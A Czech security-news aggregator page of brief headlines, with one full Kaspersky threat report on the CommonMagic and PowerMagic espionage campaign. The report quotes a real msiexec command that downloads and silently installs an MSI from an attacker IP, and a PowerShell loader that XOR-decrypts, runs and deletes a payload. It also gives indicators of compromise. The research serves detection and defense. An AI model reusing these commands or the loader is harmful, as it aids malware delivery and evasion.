Viry a Červi

India's absurd infosec reporting rules get just 15 followers

The Register - Anti-Virus - 22 Březen, 2023 - 05:30
CERT-In was told its six-hour notification requirement was a bad idea – now it knows just how bad

India's rules requiring local organizations to report infosec incidents within six hours of detection have been observed by a mere 15 entities/…

Kategorie: Viry a Červi

Xi, Putin declare intent to rule the world of AI, infosec

The Register - Anti-Virus - 22 Březen, 2023 - 03:58
'Technological sovereignty is the key to sustainability' states Russian despot

Russian president Vladimir Putin and his Chinese counterpart Xi Jinping have set themselves the goal of dominating the world of information technology.…

Kategorie: Viry a Červi

BreachForums shuts down ... but the RaidForums cybercrime universe will likely spawn a trilogy

The Register - Anti-Virus - 22 Březen, 2023 - 02:45
Admins decide reviving crime-mart is dangerous, hint at new chapter

BreachForums has reportedly shut down for good, just days after US authorities arrested the online criminal marketplace's alleged chief administrator.…

Kategorie: Viry a Červi

You just gonna take that AWS? Let Microsoft school your users on cloud security?

The Register - Anti-Virus - 21 Březen, 2023 - 22:43
And Google Cloud is next

Microsoft has torn the wraps off its multi-cloud security benchmark (MCSB), which replaces the four-year-old Azure Security Benchmark. Crucially, as the name suggests, it now has usage and configuration guidance that reaches into rival environments.…

Kategorie: Viry a Červi

Google Pixel phones had a serious data leakage bug – here’s what to do!

Sophos Naked Security - 21 Březen, 2023 - 21:58
What if the "safe" images you shared after carefully cropping them... had some or all of the "unsafe" pixels left behind anyway?

Ex-Meta security staffer accuses Greece of spying on her phone

The Register - Anti-Virus - 21 Březen, 2023 - 10:31
Beware of Greeks bearing GIFs

Meta's former security policy manager, who split her time between the US and Greece, is reportedly suing the Hellenic national intelligence service for hacking her phone.…

Kategorie: Viry a Červi

Bad magic: new APT found in the area of Russo-Ukrainian conflict

Kaspersky Securelist - 21 Březen, 2023 - 10:00

Since the start of the Russo-Ukrainian conflict, Kaspersky researchers and the international community at large have identified a significant number of cyberattacks executed in a political and geopolitical context. We previously published an overview of cyber activities and the threat landscape related to the conflict between Russia and Ukraine and continue to monitor new threats in these regions.

In October 2022, we identified an active infection of government, agriculture and transportation organizations located in the Donetsk, Lugansk, and Crimea regions. Although the initial vector of compromise is unclear, the details of the next stage imply the use of spear phishing or similar methods. The victims navigated to a URL pointing to a ZIP archive hosted on a malicious web server. The archive, in turn, contained two files:

  • A decoy document (we discovered PDF, XLSX and DOCX versions)
  • A malicious LNK file with a double extension (e.g., .pdf.lnk) that leads to infection when opened

Malicious ZIP archive

Decoy Word document (subject: Results of the State Duma elections in the Republic of Crimea)

In several cases, the contents of the decoy document were directly related to the name of the malicious LNK to trick the user into activating it. For example, one archive contained an LNK file named “Приказ Минфина ДНР № 176.pdf.lnk” (Ministry of Finance Decree No. 176), and the decoy document explicitly referenced it by name in the text.

Decoy PDF with reference to a malicious shortcut file (subject: information about DPR Ministry of Finance Decree No. 176)

The ZIP files were downloaded from various locations hosted on two domains: webservice-srv[.]online and webservice-srv1[.]online

Known attachment names, redacted to remove personal information:

MD5 (name) First detection 0a95a985e6be0918fdb4bfabf0847b5a (новое отмена решений уик 2021-09-22 13:47 ecb7af5771f4fe36a3065dc4d5516d84 (внесение_изменений_в_отдельные_законодательные_акты_рф.zip) 2022-04-28 07:36 765f45198cb8039079a28289eab761c5 (гражданин рб (redacted) .zip) 2022-06-06 11:40 ebaf3c6818bfc619ca2876abd6979f6d (цик 2022-08-05 08:39 1032986517836a8b1f87db954722a33f (сз 14-1519 от 2022-08-12 10:21 1de44e8da621cdeb62825d367693c75e (приказ минфина днр № 2022-09-23 08:10

When the potential victim activates the LNK file included in the ZIP file, it triggers a chain of events that lead to the infection of the computer with a previously unseen malicious framework that we named CommonMagic. The malware and techniques used in this campaign are not particularly sophisticated, but are effective, and the code has no direct relation to any known campaigns.

Infection chain

Infection chain

Installation workflow

The malicious LNK points to a remotely hosted malicious MSI file that is downloaded and started by the Windows Installer executable.

%WINDIR%\System32\msiexec.exe /i http://185.166.217[.]184/CFVJKXIUPHESRHUSE4FHUREHUIFERAY97A4FXA/attachment.msi /quiet

The MSI file is effectively a dropper package, containing an encrypted next-stage payload (service_pack.dat), a dropper script (runservice_pack.vbs) and a decoy document that is supposed to be displayed to the victim.

Files contained in attachment.msi

The encrypted payload and the decoy document are written to the folder named %APPDATA%\WinEventCom. The VBS dropper script is, in turn, a wrapper for launching an embedded PowerShell script that decrypts the next stage using a simple one-byte XOR, launches it and deletes it from disk.

Decryption of service_pack.dat

$inst="$env:APPDATA\WinEventCom\service_pack.dat"; if (!(Test-Path $inst)){ return; } $binst=[System.IO.File]::ReadAllBytes($inst); $xbinst=New-Object Byte[] $binst.Count; for ($i=0;$i-lt$binst.Count;$i++) { $xbinst[$i]=$binst[$i]-bxor0x13; $xbinst[$i]=$binst[$i]-bxor0x55; $xbinst[$i]=$binst[$i]-bxor0xFF; $xbinst[$i]=$binst[$i]-bxor0xFF; }; Try { [System.Text.Encoding]::ASCII.GetString($xbinst)|iex; } Catch {}; Start-Sleep 3; Remove-Item -Path $inst -Force

The next-stage script finalizes the installation: it opens the decoy document to display it to the user, writes two files named config and manutil.vbs to %APPDATA%\WinEventCom, and creates a Task Scheduler job named WindowsActiveXTaskTrigger, to execute the wscript.exe%APPDATA%\WinEventCom\manutil.vbs command every day.

The PowerMagic backdoor

The script manutil.vbs, which is dropped by the initial package, is a loader for a previously unknown backdoor written in PowerShell that we named PowerMagic. The main body of the backdoor is read from the file %APPDATA%\WinEventCom\config and decrypted with a simple XOR (key: 0x10).

Snippet of PowerMagic’s code containing the “powermagic” string

$AppDir='powermagic'; $ClinetDir='client'; $ClinetTaskDir='task'; $ClinetResultDir='result'; $ClientToken=redacted $dbx_up=''; $dbx_down = '';

When started, the backdoor creates a mutex – WinEventCom. Then, it enters an infinite loop communicating with its C&C server, receiving commands and uploading results in response. It uses OneDrive and Dropbox folders as transport, and OAuth refresh tokens as credentials.

Every minute the backdoor performs the following actions:

  1. Modifies the heartbeat file located at /$AppDir/$ClientDir/<machine UID> (the values of the $AppDir and $ClientDir PowerShell variables may differ between samples). The contents of this file consist of the backdoor PID and a number incremented by one with each file modification.
  2. Downloads commands that are stored as a file in the /$AppDir/$ClientTaskDir directory.
  3. Executes every command as a PowerShell script.
  4. Uploads the output of the executed PowerShell command to the cloud storage, placing it in the /$AppDir/$ClientResultDir/<victim machine UUID>.<timestamp> file.
The CommonMagic framework

As it turned out, PowerMagic was not the only malicious toolkit used by the actor. All the victims of PowerMagic were also infected with a more complicated, previously unseen, modular malicious framework that we named CommonMagic. This framework was deployed after initial infection with the PowerShell backdoor, leading us to believe that CommonMagic is deployed via PowerMagic.

The CommonMagic framework consists of several executable modules, all stored in the directory C:\ProgramData\CommonCommand. Modules start as standalone executable files and communicate via named pipes. There are dedicated modules for interaction with the C&C server, encryption and decryption of the C&C traffic and various malicious actions.

The diagram below illustrates the architecture of the framework.

Framework architecture

Network communication

The framework uses OneDrive remote folders as a transport. It utilizes the Microsoft Graph API using an OAuth refresh token embedded into the module binary for authentication. The RapidJSON library is used for parsing JSON objects returned by the Graph API.

A dedicated heartbeat thread updates the remote file <victim ID>/S/S.txt every five minutes with the local timestamp of the victim.

Then, in separate threads, the network communication module downloads new executable modules from the directory <victim ID>/M and uploads the results of their execution to the directory <victim ID>/R.

The data exchanged with the operator via the OneDrive location is encrypted using the RC5Simple open-source library. By default, this library uses the seven-byte sequence “RC5SIMP” at the beginning of the encrypted sequence, but the developers of the backdoor changed it to “Hwo7X8p”. Encryption is implemented in a separate process, communicating over the pipes named \\.\pipe\PipeMd and \\.\pipe\PipeCrDtMd.


So far, we have discovered two plugins implementing the malicious business logic. They are located in the directory C:\ProgramData\CommonCommand\Other.

  • Screenshot (S.exe) – takes screenshots every three seconds using the GDI API
  • USB (U.exe) – collects the contents of the files with the following extensions from connected USB devices: .doc, .docx. .xls, .xlsx, .rtf, .odt, .ods, .zip, .rar, .txt, .pdf.
To be continued

So far, we have found no direct links between the samples and data used in this campaign and any previously known actors. However, the campaign is still active, and our investigation continues. So, we believe that further discoveries may reveal additional information about this malware and the threat actor behind it.

CommonMagic indicators of compromise

Lure archives
0a95a985e6be0918fdb4bfabf0847b5a новое отмена решений уик (new cancellation of resolution local election committee
ecb7af5771f4fe36a3065dc4d5516d84 внесение_изменений_в_отдельные_законодательные_акты_рф.zip (making changes to several russian federation
765f45198cb8039079a28289eab761c5 гражданин рб (redacted) .zip (citizen of republic of belarus (redacted).zip)
ebaf3c6818bfc619ca2876abd6979f6d цик (central election committee
1032986517836a8b1f87db954722a33f сз 14-1519 от (memo 14-1519 dated
1de44e8da621cdeb62825d367693c75e приказ минфина днр № (dpr ministry of finance order

PowerMagic installer
fee3db5db8817e82b1af4cedafd2f346 attachment.msi

PowerMagic dropper
bec44b3194c78f6e858b1768c071c5db service_pack.dat

PowerMagic loader
8c2f5e7432f1e6ad22002991772d589b manutil.vbs

PowerMagic backdoor

CommonMagic loader
ce8d77af445e3a7c7e56a6ea53af8c0d All.exe

CommonMagic cryptography module
9e19fe5c3cf3e81f347dd78cf3c2e0c2 Clean.exe

CommonMagic network communication module
7c0e5627fd25c40374bc22035d3fadd8 Overall.exe

Distribution servers

Putin to staffers: Throw out your iPhones, or 'give it to the kids'

The Register - Anti-Virus - 21 Březen, 2023 - 08:30
April Fools should use Russian or Chinese tech instead, Kremlin advises

Advisors and staff to Russia's maximum leader have been told to ditch their iPhones by the end of the month. Or, for those who don't want to throw their Apple devices in the bin, the other option is to "give it to the kids," according to a local Kommersant report.…

Kategorie: Viry a Červi

Google suspends top Chinese shopping app Pinduoduo

The Register - Anti-Virus - 21 Březen, 2023 - 07:58
Alleges it’s infected with malware – but not the version in its own digital tat bazaar

Google has suspended Chinese shopping app Pinduoduo from its Play store because versions of the software found elsewhere have included malware.…

Kategorie: Viry a Červi

Australian FinTech takes itself offline to deal with cyber incident that caused data leak

The Register - Anti-Virus - 21 Březen, 2023 - 05:58
Latitude blames a 'major vendor' for its woes. Is that a vendor? A cloud? Whoever they are, they're in trouble

Latitude Financial has blamed a supplier for leaking creds that caused vast PII leak Australian outfit Latitude Financial has taken itself offline, and even stopped serving customers, while it tries to clean up an attack on its systems.…

Kategorie: Viry a Červi

Ferrari in a spin as crims steal a car-load of customer data

The Register - Anti-Virus - 21 Březen, 2023 - 03:45
Speeds away from the very suggestion it would ever pay a ransom

Italian automaker Ferrari has warned its well-heeled customers that their personal data may be at risk.…

Kategorie: Viry a Červi

Privacy fail: Pictures cropped, redacted by Google Pixel phones can be recovered

The Register - Anti-Virus - 20 Březen, 2023 - 23:13
aCropalypse Now, starring any 2018-or-later device

Updated  If you've owned a Google Pixel smartphone since the 3 series came out in 2018, bad news: any screenshot that you've cropped or redacted on your Pixel can be potentially restored without much fuss.…

Kategorie: Viry a Červi

Bitcoin ATM customers hacked by video upload that was actually an app

Sophos Naked Security - 20 Březen, 2023 - 21:50
As the misquote goes, "Once is misfortune..." This is the second time, and you know what Lady Bracknell had to say about that...

BBC to staff: Uninstall TikTok from our corporate kit unless you can 'justify' having it

The Register - Anti-Virus - 20 Březen, 2023 - 14:34
Those with 'sensitive' work-related information told to contact Beeb's security team

The world's oldest national broadcaster, the venerable British Broadcasting Corporation, has told staff they shouldn't keep the TikTok app on a BBC corporate device unless there is a "justified business reason."…

Kategorie: Viry a Červi

Vessels claiming to be Chinese warships are messing with passenger planes

The Register - Anti-Virus - 20 Březen, 2023 - 09:29
Australian airline Qantas warns pilots to keep calm and carry on amid reports of satnav and altimeter jamming

Australian airline Qantas issued standing orders to its pilots last week advising them that some of its fleet experienced interference on VHF stations from sources purporting to be the Chinese Military.…

Kategorie: Viry a Červi

Police pounce on 'pompompurin' – alleged mastermind of BreachForums

The Register - Anti-Virus - 20 Březen, 2023 - 08:02
Crypto laundering service gets cleaned up by police and SVB mess draws in more criminals

In Brief  A man accused of being the head of one of the biggest criminal online souks, BreachForums, has been arrested in Peekskill, New York.…

Kategorie: Viry a Červi

TikTok cannot be considered a private company, says Australian report

The Register - Anti-Virus - 20 Březen, 2023 - 01:30
ALSO: Japan ends chip supply crimp on South Korea, APAC infosec spending surges; Philippines SIM registration stalls

Asia In Brief  ByteDance, the Chinese developer of TikTok, "can no longer be accurately described as a private enterprise" and is instead intertwined with China's government, according to a report [PDF] submitted to Australia's Select Committee on Foreign Interference through Social Media.…

Kategorie: Viry a Červi

BianLian ransomware crew goes 100% extortion after free decryptor lands

The Register - Anti-Virus - 19 Březen, 2023 - 15:37
No good deed goes unpunished, or something like that

The BianLian gang is ditching the encrypting-files-and-demanding-ransom route and instead is going for full-on extortion.…

Kategorie: Viry a Červi

You've been pwned, how much will each stolen customer SSN cost you? How about $7.5k?

The Register - Anti-Virus - 18 Březen, 2023 - 16:02
At the very least, with other costs on top

A Florida healthcare group has settled a class-action lawsuit after thieves stole more than 447,000 patients' names, Social Security numbers, and sensitive medical information, from its servers.…

Kategorie: Viry a Červi

Google: Turn off Wi-Fi calling, VoLTE to protect your Android from Samsung hijack bugs

The Register - Anti-Virus - 17 Březen, 2023 - 22:35
Four flaws open mobiles, cars to remote-control at baseband level with just a phone number

Google security analysts have warned Android device users that several zero-day vulnerabilities in some Samsung chipsets could allow an attacker to completely hijack and remote-control their handsets knowing just the phone number.…

Kategorie: Viry a Červi
Syndikovat obsah